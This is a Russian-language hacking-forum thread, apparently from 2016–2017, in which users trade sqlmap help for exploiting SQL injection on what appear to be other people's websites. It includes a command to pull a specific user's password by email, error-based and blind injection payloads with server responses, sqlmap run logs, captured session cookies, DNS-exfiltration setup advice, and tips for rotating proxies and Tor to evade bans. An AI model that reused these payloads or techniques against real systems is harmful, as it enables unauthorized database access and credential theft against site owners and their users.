25.12.2016, 00:02
karkajoi said:
↑ (https://antichat.live/posts/4028351/)
Вручную пробовать, может там вообще нету дыры.
У меня вопрос, если я знаю email конкретного пользователя и мне надо выташить из базы его пароль. Как это сделать? id и прочее не знаю. Тип иньекции boolean-based blind. Можно ли как-то настроить sqlmap чтобы искала конкретный mail и вытаскивала пароль от нее? Т.к база очень большая, полный дамп может затянутся на недели.


-C pass --where="email='admin@mail.com (mailto:admin@mail.com)'" --dump

axelmill
28.12.2016, 19:41
Пытаюсь заюзать уязвимость через sqlmap time based методом, но процесс очень медленно протекает. В общем нужно попробовать через DNS exfiltration.

Подскажите, пожалуйста, если кто настраивал как поднять днс и настроить, чтобы можно было использовать --dns-domain

brown
03.01.2017, 10:24
Code:
-------Boundary_NTHBPFPLPE
Content-Disposition: form-data; name="email"

sample@email.tst
-------Boundary_NTHBPFPLPE
Content-Disposition: form-data; name="password"

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR( 81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(11 1),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
-------Boundary_NTHBPFPLPE--

Response
HTTP/1.1 500 Duplicate entry '4CunQ7pfmop1' for key 'group_key' SQL=SELECT * FROM #__mijoshop_customer WHERE LOWER(email) = 'sample@email.tst' AND (password = SHA1(CONCAT(salt, SHA1(CONCAT(salt, SHA1('\'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR( 81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(11 1),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\''))))) OR password = '55a651117e240d7021e2bc35bb379d7e' OR password = ''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR( 81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(11 1),CHAR(112)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'' OR password = ''and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(110),CHAR( 81),CHAR(55),CHAR(112),CHAR(102),CHAR(109),CHAR(11 1),CHAR(112)) from information_schemaCache-Control: no-cache
Server: nginx
Date: Fri, 30 Dec 2016 12:49:40 GMT
Content-Type: text/html

Почему мап не цепляет?

Alex_Smolin
06.01.2017, 19:33
axelmill said:
↑ (https://antichat.live/posts/4029815/)
Пытаюсь заюзать уязвимость через sqlmap time based методом, но процесс очень медленно протекает. В общем нужно попробовать через DNS exfiltration.
Подскажите, пожалуйста, если кто настраивал как поднять днс и настроить, чтобы можно было использовать --dns-domain


Покупаешь 2 впс или дедики, ставишь на них бинд9 для поднятия мастер и слейв днс сервера.

Потом регаешь домен любой на свои днс, после того как домен делигрировали, запускаешь скульмап с ключом --dns-domain (скульмап нужно запускать не у себя на пк, а на впс там где твой мастер днс)

Но заметь DNS exfiltration получится заюзать когда сервер сайта на винде если на линуксе то ничего не выйдет

artur1111
16.01.2017, 00:56
Подскажите! через sqlmap получил sql inj под ограниченной учеткой, доступно только SELECT, сбрутил хэши других пользователей базы данных у которых больше прав, как мне в sqlmap подключится к другой учетке через sql inj?

t0ma5
16.01.2017, 02:26
artur1111 said:
↑ (https://antichat.live/posts/4036467/)
Подскажите! через sqlmap получил sql inj под ограниченной учеткой, доступно только SELECT, сбрутил хэши других пользователей базы данных у которых больше прав, как мне в sqlmap подключится к другой учетке через sql inj?


никак, ищите интерфейс доступа к бд, phpmyadmin etc

t0ma5
16.01.2017, 02:27
artur1111 said:
↑ (https://antichat.live/posts/4036467/)
Но заметь DNS exfiltration получится заюзать когда сервер сайта на винде если на линуксе то ничего не выйдет


лол с чего бы это интересно?

Alex_Smolin
17.01.2017, 13:31
t0ma5 said:
↑ (https://antichat.live/posts/4036501/)
лол с чего бы это интересно?


для успешной организации DNS-туннеля в Microsoft SQL Server, PostgreSQL и MySQL эти СУБД должны поддерживать пути в формате UNC, что, в общем-то, означает, что такой туннель можно создать, если на сервере в качестве бэкенда будет использоваться ОС Microsoft Windows.

t0ma5
17.01.2017, 15:52
Alex_Smolin said:
↑ (https://antichat.live/posts/4037003/)
для успешной организации DNS-туннеля в Microsoft SQL Server, PostgreSQL и MySQL эти СУБД должны поддерживать пути в формате UNC, что, в общем-то, означает, что такой туннель можно создать, если на сервере в качестве бэкенда будет использоваться ОС Microsoft Windows.


ну не правда же есть нное количество способ сделать резолв домена, например oracle

UTL_INADDR.GET_HOST_ADDRESS

UTL_HTTP.REQUEST

HTTPURITYPE.GETCLOB

в postgresql, если не ошибаюсь, можно организовать подключение к удаленной бд "на лету", в текущем подключении, чем не dns exfiltration? пусть даже трафик исходящий зарезан на большинство портов, резолв всё равно в большинстве случаев пройдет

kacergei
18.01.2017, 13:18
добрый подскажие как решить

Как только не пробовал и указывать --dbms=mysql | -b | -f

А в результате:

[CRITICAL] sqlmap was not able to fingerprint the back-end database management system

P.S>

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

.SpoilerTarget" type="button">Spoiler: sqlmap

[CODE]
Code:
___
__H__
___ ___[.]_____ ___ ___ {1.1.1.10#dev}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

starting at 10:48:05

[10:48:05] [INFO] parsing HTTP request from 'vsd.txt'
[10:48:05] [WARNING] provided value for parameter 'user_search_products[status]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:48:05] [WARNING] provided value for parameter 'user_search_products[search_type]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:48:05] [INFO] testing connection to the target URL
[10:48:06] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[10:48:08] [WARNING] reflective value(s) found and filtering out
[10:48:08] [INFO] testing if the target URL is stable
[10:48:09] [INFO] target URL is stable
[10:48:09] [INFO] testing if POST parameter 'user_search_products[from]' is dynamic
[10:48:10] [INFO] confirming that POST parameter 'user_search_products[from]' is dynamic
[10:48:10] [INFO] POST parameter 'user_search_products[from]' is dynamic
[10:48:11] [WARNING] heuristic (basic) test shows that POST parameter 'user_search_products[from]' might not be injectable
[10:48:11] [INFO] testing for SQL injection on POST parameter 'user_search_products[from]'
[10:48:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:48:26] [INFO] POST parameter 'user_search_products[from]' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="\u0421\u0430\u043d\u043a\u0442-\u041f\u0435\u0442\u0435\u0440\u0431\u0443\u0440\u 0433, \u0420\u043e\u0441\u0441\u0438\u044f - \u041c\u043e\u0441\u043a\u0432\u0430, \u0420\u043e\u0441\u0441\u0438\u044f")
[10:48:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:48:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:48:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:48:34] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:48:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:48:35] [INFO] testing 'MySQL inline queries'
[10:48:36] [INFO] testing 'PostgreSQL inline queries'
[10:48:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[10:48:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:48:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:48:38] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:48:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[10:48:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:48:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:48:40] [INFO] testing 'Oracle AND time-based blind'
[10:48:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:48:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:48:51] [INFO] checking if the injection point on POST parameter 'user_search_products[from]' is a false positive
POST parameter 'user_search_products[from]' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 65 HTTP(s) requests:
---
Parameter: user_search_products[from] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: user_search_products[from]=%D0%A1%D0%B0%D0%BD%D0%BA%D1%82-%D0%9F%D0%B5%D1%82%D0%B5%D1%80%D0%B1%D1%83%D1%80%D 0%B3, %D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%' AND 5693=5693 AND '%'='&user_search_products[to]=%D0%9C%D0%BE%D1%81%D0%BA%D0%B2%D0%B0, %D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F&user_search_products[startDate]=2017-01-18&user_search_products[endDate]=2017-01-31&user_search_products[train]=train&user_search_products[car]=car&user_search_products[status]=&user_search_products[search_type]=&user_search_products[search]=1&user_search_products[_token]=51dfe11994f10d02f4d92c43fed3b00ef606f937
---
[10:49:00] [INFO] testing MySQL
[10:49:00] [WARNING] the back-end DBMS is not MySQL
[10:49:00] [INFO] testing Oracle
[10:49:01] [WARNING] the back-end DBMS is not Oracle
[10:49:01] [INFO] testing PostgreSQL
[10:49:01] [WARNING] the back-end DBMS is not PostgreSQL
[10:49:01] [INFO] testing Microsoft SQL Server
[10:49:02] [WARNING] the back-end DBMS is not Microsoft SQL Server
[10:49:02] [INFO] testing SQLite
[10:49:02] [WARNING] the back-end DBMS is not SQLite
[10:49:02] [INFO] testing Microsoft Access
[10:49:03] [WARNING] the back-end DBMS is not Microsoft Access
[10:49:03] [INFO] testing Firebird
[10:49:03] [WARNING] the back-end DBMS is not Firebird
[10:49:03] [INFO] testing SAP MaxDB
[10:49:04] [WARNING] the back-end DBMS is not SAP MaxDB
[10:49:04] [INFO] testing Sybase
[10:49:05] [WARNING] the back-end DBMS is not Sybase
[10:49:05] [INFO] testing IBM DB2
[10:49:05] [WARNING] the back-end DBMS is not IBM DB2
[10:49:05] [INFO] testing HSQLDB
[10:49:06] [WARNING] the back-end DBMS is not HSQLDB or version is

RWD
22.01.2017, 05:20
вообщем уязвимость в файле /login.php

Attack details

URL encoded POST input vb_login_username was set to -1' OR 3*2*1=6 AND 000491=000491 --

как такое заправить в sqlmap и получить бд?

POST /ajax/login.php HTTP/1.1

Content-Length: 193

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http:site.com:80/

Cookie: mfsid=91olg79e3nj5nt6de6ugq5oks7; mfvb_lastvisit=1485043348; msort=views; morder=az; mfvb_sessionhash=a5613f6c416d595ef35b6db03ad466a7; loc=E_E4m6IbF_VLlaDm7ph_BwfJ46y_JHz15zI7eP9Q9gdwwJ Or1usrLEth4LHDV1uyf0w6PWeToMTTYQJ0iyccmipr2OpL5jZf ; sess=1; anj=dTM7k!M4/8DYRWSF']wIg2E?ajgksu!@wnf]meq8dWME4(EW

RWD
22.01.2017, 11:50
palec2006 said:
↑ (https://antichat.live/posts/4038997/)
вместе с выводом error based приходит заголовок 403, как скылмапить?


мб waf?

sepo
22.01.2017, 13:49
[QUOTE="RWD"]
RWD said:
↑ (https://antichat.live/posts/4038977/)
вообщем уязвимость в файле /login.php
Attack details
URL encoded POST input
vb_login_username
was set to
-1' OR 3*2*1=6 AND 000491=000491 --
как такое заправить в sqlmap и получить бд?
POST /ajax/login.php HTTP/1.1
Content-Length: 193
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http:site.com:80/
Cookie: mfsid=91olg79e3nj5nt6de6ugq5oks7; mfvb_lastvisit=1485043348; msort=views; morder=az; mfvb_sessionhash=a5613f6c416d595ef35b6db03ad466a7; loc=E_E4m6IbF_VLlaDm7ph_BwfJ46y_JHz15zI7eP9Q9gdwwJ Or1usrLEth4LHDV1uyf0w6PWeToMTTYQJ0iyccmipr2OpL5jZf ; sess=1; anj=dTM7k!M4/8DYRWSF']wIg2E?ajgksu!@wnf]meq8dWME4(EW

t0ma5
22.01.2017, 15:23
palec2006 said:
↑ (https://antichat.live/posts/4039023/)
нет, не ваф, руками всё нормально лезет, только вывод вместе с 403 и скулмап не тянет


sqlmap похоже чекает нет ли там waf


Code:
./waf/webappsecure.py:15: return code == 403

попробуй добавить --skip-waf

DSW
22.01.2017, 16:42
[QUOTE="RWD"]
RWD said:
↑ (https://antichat.live/posts/4038977/)
вообщем уязвимость в файле /login.php
Attack details
URL encoded POST input
vb_login_username
was set to
-1' OR 3*2*1=6 AND 000491=000491 --
как такое заправить в sqlmap и получить бд?
POST /ajax/login.php HTTP/1.1
Content-Length: 193
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http:site.com:80/
Cookie: mfsid=91olg79e3nj5nt6de6ugq5oks7; mfvb_lastvisit=1485043348; msort=views; morder=az; mfvb_sessionhash=a5613f6c416d595ef35b6db03ad466a7; loc=E_E4m6IbF_VLlaDm7ph_BwfJ46y_JHz15zI7eP9Q9gdwwJ Or1usrLEth4LHDV1uyf0w6PWeToMTTYQJ0iyccmipr2OpL5jZf ; sess=1; anj=dTM7k!M4/8DYRWSF']wIg2E?ajgksu!@wnf]meq8dWME4(EW

grimnir
22.01.2017, 16:49
sepo said:
↑ (https://antichat.live/posts/4039056/)
Скинь ссылку в ПМ, помогу




Code:
-u "http://www.site.com/login.php" --random-agent --threads=6 --data="cookieuser=1&do=login&s=&securitytoken=&vb_login_md5password=&vb_login_md5password_utf=&vb_login_password=g00dPa%24%24w0rD&vb_login_username=1*" --level=5 --current-db

RWD
22.01.2017, 17:14
grimnir said:
↑ (https://antichat.live/posts/4039150/)

Code:
-u "http://www.site.com/login.php" --random-agent --threads=6 --data="cookieuser=1&do=login&s=&securitytoken=&vb_login_md5password=&vb_login_md5password_utf=&vb_login_password=g00dPa%24%24w0rD&vb_login_username=1*" --level=5 --current-db



да в том то и дело что пробовал так, Acunetix говорит что дыра есть 100%http://i.imgur.com/jkLoTzb.png

DSW
22.01.2017, 17:20
RWD said:
↑ (https://antichat.live/posts/4039164/)
да в том то и дело что пробовал так, Acunetix говорит что дыра есть 100%
http://i.imgur.com/jkLoTzb.png


Попробуй сохронить cookie в файл ,допустим в sql.txt и после выполни

./sqlmap -r "путь до sql.txt" -p vb_login_username

RWD
25.01.2017, 17:36
вообщем есть скуль, time base blind

подбирает очень медленно, выдает ошибки, потом при таймауте 7 сек подбирает символ.

Но кроме как --current-user ничего не подбирает, кто сталкивался и как действовать?

t0ma5
25.01.2017, 18:37
RWD said:
↑ (https://antichat.live/posts/4040169/)
вообщем есть скуль, time base blind
подбирает очень медленно, выдает ошибки, потом при таймауте 7 сек подбирает символ.
Но кроме как --current-user ничего не подбирает, кто сталкивался и как действовать?


так скуль скуле рознь, приучайтесь читать логи, опция -v 3 , скульмап обычно пишет где спотыкается, вероятно waf есть

karkajoi
26.01.2017, 17:37
Можно ли запустит sqlmap через список прокси? То есть при попадании в бан 1й прокси брала из списка другую и продолжала работу?

t0ma5
26.01.2017, 18:46
karkajoi said:
↑ (https://antichat.live/posts/4040759/)
Можно ли запустит sqlmap через список прокси? То есть при попадании в бан 1й прокси брала из списка другую и продолжала работу?


попробуй

--proxy-file=PRO.. Load proxy list from a file

SooLFaa
30.01.2017, 16:59
karkajoi said:
↑ (https://antichat.live/posts/4040759/)
Можно ли запустит sqlmap через список прокси? То есть при попадании в бан 1й прокси брала из списка другую и продолжала работу?


service tor start

proxychains sqlmap .....

brown
22.02.2017, 08:32
Такая трабла,есть скуля но мап не хочет куртить мотому что не видит ответ от сервера.Как указать строку где нужно смотреть.Знаю что есть команда --string но так и не разобрался как с ней работать

Runx
22.02.2017, 13:35
Добрый день подскажите как исправить данную ситуацию :

При дампе БД или открытии таблиц , sqlmap выводит по одному символу через 3-5 сек.

Предлагает использовать --time-sec соглашаюсь.

Если отказаться, вообще не дампит

Octavian
22.02.2017, 13:50
Runx said:
↑ (https://antichat.live/posts/4051946/)
Добрый день подскажите как исправить данную ситуацию :
При дампе БД или открытии таблиц , sqlmap выводит по одному символу через 3-5 сек.
Предлагает использовать --time-sec соглашаюсь.
Если отказаться, вообще не дампит


Time based SQL-inj по другому некак

Runx
22.02.2017, 13:52
Octavian said:
↑ (https://antichat.live/posts/4051950/)
Time based SQL-inj по другому некак


Это и используется

Octavian
22.02.2017, 13:56
Runx said:
↑ (https://antichat.live/posts/4051953/)
Это и используется


Как он дампит по одному символу в секунду так и будет дампить

Runx
22.02.2017, 13:59
Octavian said:
↑ (https://antichat.live/posts/4051958/)
Как он дампит по одному символу в секунду так и будет дампить


От чего это зависит? Если попробовать заюать другую уязвимость? У меня получалось лить БД (логины, пароли) причем достаточно быстро , но сейчас использую другую скулю и нужна другая таблица ( один и тот же сайт)

RWD
22.02.2017, 16:50
Runx said:
↑ (https://antichat.live/posts/4051959/)
От чего это зависит? Если попробовать заюать другую уязвимость? У меня получалось лить БД (логины, пароли) причем достаточно быстро , но сейчас использую другую скулю и нужна другая таблица ( один и тот же сайт)


в данном случае стоит протестировать скрипт на --level 5 --risk 3, может быть булеан или юнион там есть.

brown
08.03.2017, 11:13
web application technology: ASP.NET, ASP.NET 2.0.50727

back-end DBMS: Microsoft SQL Server 2008

Пускает только в current-db,в соседние не пускает(.Есть два пользователя Админ и юзер я под юзером.У обоих нет пассов(по крайней мере null).Как подключиться под админом,или есть варинаты попасть в бд?

brown
11.03.2017, 09:34
Code:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTQ2Mjg4MDUwOA9kFgICCA9kFgQCBA8PFgIeB1Zpc2l ibGVoZGQCDA8
WAh8AaGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tle V9fFgEFBkltYWdlMQ==&productselect=All&keywordsearch=fd' AND 7226
IN (SELECT (CHAR(113) CHAR(122) CHAR(120) CHAR(113) CHAR(113) (SELECT (CASE WHEN (7226=7226) THEN CHAR(49) ELSE CHAR(48
) END)) CHAR(113) CHAR(118) CHAR(118) CHAR(113) CHAR(113)))-- mvKE&Image1.x=11&Image1.y=14
Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
---
[05:28:16] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[05:28:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[05:28:16] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management sys
tem databases' tables
[05:28:16] [INFO] fetching tables for database: sfdsffsdf
[05:28:16] [PAYLOAD] fd' AND 4667 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113) +(SELECT ISNULL(CAST(COUN
T(OPS2013..sysusers.name+CHAR(46)+OPS2013..sysobje cts.name) AS NVARCHAR(4000)),CHAR(32)) FROM OPS2013..sysobjects INNER
JOIN OPS2013..sysusers ON OPS2013..sysobjects.uid BETWEEN OPS2013 AND OPS2013..sysusers.uid WHERE OPS2013..sysobjects.xt
ype IN (CHAR(117),CHAR(118)))+CHAR(113)+CHAR(118)+CHAR(11 8)+CHAR(113)+CHAR(113)))-- ZTea
[05:28:16] [WARNING] reflective value(s) found and filtering out
[05:28:16] [WARNING] the SQL query provided does not return any output
[05:28:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch
'--hex'
[05:28:16] [PAYLOAD] fd' AND 9754 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(113) +(SELECT ISNULL(CAST(COUN
T(name) AS NVARCHAR(4000)),CHAR(32)) FROM OPS2013..sysobjects WHERE xtype BETWEEN CHAR AND CHAR(85))+CHAR(113)+CHAR(118)
+CHAR(118)+CHAR(113)+CHAR(113)))-- jCfI
[05:28:17] [WARNING] the SQL query provided does not return any output
[05:28:17] [CRITICAL] unable to retrieve the tables for any database

Не могу получить таблицы

parse-error


Code:
'System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster'

danil911
12.03.2017, 17:42
Не получается проэксплуатировать, если перейти по такой ссылке site.ru/filmnews/1, то респонс будет такой :


HTML:

Warning: implode() [function.implode]: Invalid arguments passed in /home/web/site/www/modules/filmnews.php on line 42

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/web/site/www/modules/filmnews.php on line 43




запуск sqlmap.py -u "site.ru/filmnews/1*" не помогает, складывается ощущение, что чего-то не хватает.

brown
12.03.2017, 18:29
sqlmap.py -u "site.ru/filmnews/1*"


danil911 said:
↑ (https://antichat.live/posts/4059381/)
Не получается проэксплуатировать, если перейти по такой ссылке site.ru/filmnews/1, то респонс будет такой :

HTML:

Warning: implode() [function.implode]: Invalid arguments passed in /home/web/site/www/modules/filmnews.php on line 42

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/web/site/www/modules/filmnews.php on line 43



запуск sqlmap.py -u "site.ru/filmnews/1*" не помогает, складывается ощущение, что чего-то не хватает.


--level 3 --risk 3 --threads 10 --no-cast

nitupme
23.03.2017, 11:28
всем привет. такой вопрос:

Существует ли в sqlmap такой синтаксис чтобы sqlmap не требовал подтверждения.

Т.е не задавал вопрос типа "for the remaining tests, do you want to include all tests for 'MySQL' extending

provided level (1) and risk (1) values? [Y/n]" а автоматом ставил y или n ???

cat1vo
23.03.2017, 12:59
nitupme said:
↑ (https://antichat.live/posts/4064009/)
всем привет. такой вопрос:
Существует ли в sqlmap такой синтаксис чтобы sqlmap не требовал подтверждения.
Т.е не задавал вопрос типа "for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (1) and risk (1) values? [Y/n]" а автоматом ставил y или n ???


--batch Never ask for user input, use the default behaviour

PoliGroS
25.03.2017, 22:32
Уязвимость в https://site./x(Elx)%5c-1.html


C:\sql>python sqlmap.py -r 1.txt --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201512260a8c}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_|
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
starting at 19:52:36
[19:52:36] [INFO] parsing HTTP request from '1.txt'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[19:52:37] [WARNING] provided value for parameter 'phpbb3_espdc_k' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[19:52:37] [INFO] testing connection to the target URL
sqlmap got a 301 redirect to '
https://site./x(Elx)5c-1.html
'. Do you want to follow? [Y/n] n
[19:52:40] [ERROR] detected invalid data for declared content encoding 'gzip' ('size too large')
[19:52:40] [WARNING] turning off page compression
[19:52:40] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)
[19:52:40] [WARNING] if the problem persists please check that the provided target URL is valid. In case that it is, you can try to rerun with the switch '--random-agent' turned on and/or proxy switches ('--ignore-proxy', '--proxy',...)
[19:52:40] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[19:52:41] [INFO] testing if the target URL is stable
[19:52:41] [WARNING] URI parameter '#1*' does not appear dynamic
[19:52:41] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:52:41] [INFO] testing for SQL injection on URI parameter '#1*'
[19:52:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:52:44] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:52:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:52:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:52:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:52:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:52:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:52:51] [INFO] testing 'MySQL inline queries'
[19:52:51] [INFO] testing 'PostgreSQL inline queries'
[19:52:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:52:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:52:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:52:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:52:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:52:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:52:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:52:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:53:00] [INFO] testing 'Oracle AND time-based blind'
[19:53:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:53:02] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:53:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:53:52] [WARNING] URI parameter '#1*' is not injectable
[19:53:52] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
shutting down at 19:53:52

karkajoi
28.03.2017, 16:09
PoliGroS said:
↑ (https://antichat.live/posts/4064967/)
Уязвимость в
https://site./x(Elx)
%
5c-1.html


Try to increase '--level'/'--risk' values to perform more tests. Написано жи. Пробуй risk=3 level=5

brown
15.04.2017, 12:37
URL encoded POST input ctl00%24mainbody%24txtZip was set to (select convert(int,CHAR(65)))

Error message found:

SqlException

(select convert(int,CHAR(65))) - это какой темпер?

RWD
16.04.2017, 17:44
Вообщем есть скуль, вроде бы не фейлс поситив, инъекция блинд.

URL encoded GET input uid was set to -1 OR 3*2*1=6 AND 00095=00095

Tests performed:


-1 OR 2+95-95-1=0+0+0+1 => TRUE

-1 OR 3+95-95-1=0+0+0+1 => FALSE

-1 OR 3*2 FALSE

-1 OR 3*2>(0+5+95-95) => FALSE

-1 OR 2+1-1-1=1 AND 00095=00095 => TRUE

-1 OR 00095=00095 AND 3+1-1-1=1 => FALSE

-1 OR 3*2=5 AND 00095=00095 => FALSE

-1 OR 3*2=6 AND 00095=00095 => TRUE

-1 OR 3*2*0=6 AND 00095=00095 => FALSE

-1 OR 3*2*1=6 AND 00095=00095 => TRUE
но скульмап почему то нивкакую не хочет зацепиться за линк, есть идеи?

level 5 risk 3 пробовал, не видит.

RaWaS
16.04.2017, 21:43
RWD said:
↑ (https://antichat.live/posts/4073169/)
Вообщем есть скуль, вроде бы не фейлс поситив, инъекция блинд.
URL encoded GET input
uid
was set to
-1 OR 3*2*1=6 AND 00095=00095
Tests performed:

-1 OR 2+95-95-1=0+0+0+1 => TRUE

-1 OR 3+95-95-1=0+0+0+1 => FALSE

-1 OR 3*2 FALSE

-1 OR 3*2>(0+5+95-95) => FALSE

-1 OR 2+1-1-1=1 AND 00095=00095 => TRUE

-1 OR 00095=00095 AND 3+1-1-1=1 => FALSE

-1 OR 3*2=5 AND 00095=00095 => FALSE

-1 OR 3*2=6 AND 00095=00095 => TRUE

-1 OR 3*2*0=6 AND 00095=00095 => FALSE

-1 OR 3*2*1=6 AND 00095=00095 => TRUE

но скульмап почему то нивкакую не хочет зацепиться за линк, есть идеи?
level 5 risk 3 пробовал, не видит.



Не всегда Акунетикс прав.

Неправильно вставляешь ссылку

невыставлен должный уровень скана --level 5 --risk 3

и еще куча других вариантов. Выложи то что нашел акунетикс.

RaWaS
16.04.2017, 21:51
brown said:
↑ (https://antichat.live/posts/4072563/)
URL encoded POST input ctl00%24mainbody%24txtZip was set to (select convert(int,CHAR(65)))
Error message found:
SqlException
(select convert(int,CHAR(65))) - это какой темпер?


Так задайте вопрос Акунетиксу, причем тут склмап? Либо выкладывайте полную выдачу.

brown
17.04.2017, 00:05
RaWaS said:
↑ (https://antichat.live/posts/4073300/)
Так задайте вопрос Акунетиксу, причем тут склмап? Либо выкладывайте полную выдачу.


причем тут полная выдача и кодировка?

Shubka75
17.04.2017, 01:14
brown said:
↑ (https://antichat.live/posts/4072563/)
(select convert(int,CHAR(65))) - это какой темпер?


по синтаксису это еррор-басед в mssql, но на деле скорее всего фолс от акунетикса

Groove
26.04.2017, 02:32
Что я делаю не так ???


Code:
D:\>python\python.exe D:\py\sqlmap\sqlmap.py -u http://site.ru/jewell
ery.php?subcategory=8&parent_ID=8&sub=&open=339 --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.1.4.48#dev}
|_ -| . [(] | .'| . |
